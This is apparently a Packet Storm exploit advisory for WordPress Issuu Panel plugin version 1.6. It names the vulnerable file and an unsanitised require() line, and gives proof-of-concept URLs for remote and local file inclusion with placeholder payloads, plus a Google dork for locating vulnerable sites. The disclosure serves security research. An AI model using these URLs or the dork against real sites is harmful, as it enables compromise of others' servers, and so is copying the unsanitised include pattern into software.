WordPress Issuu Panel plugin version 1.6 suffers from local file inclusion and remote file inclusion vulnerabilities.
a996002a712018e88a8aed792ec836191644cec4370e3d309eaea43f8351f730# Exploit Title: Wordpress Plugin Issuu Panel - RFI & LFI
# Exploit Author: CrashBandicot
# Date: 2016-03-23
# Google Dork : inurl:/wp-content/plugins/issuu-panel/
# Vendor Homepage: https://wordpress.org/plugins/issuu-panel/
# Tested on: MsWIn
# Version: 1.6
# Vulnerable File : menu/documento/requests/ajax-docs.php
3. require($_GET['abspath'] . '/wp-load.php');
# PoC : http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[RFI]
http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[LFI]
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed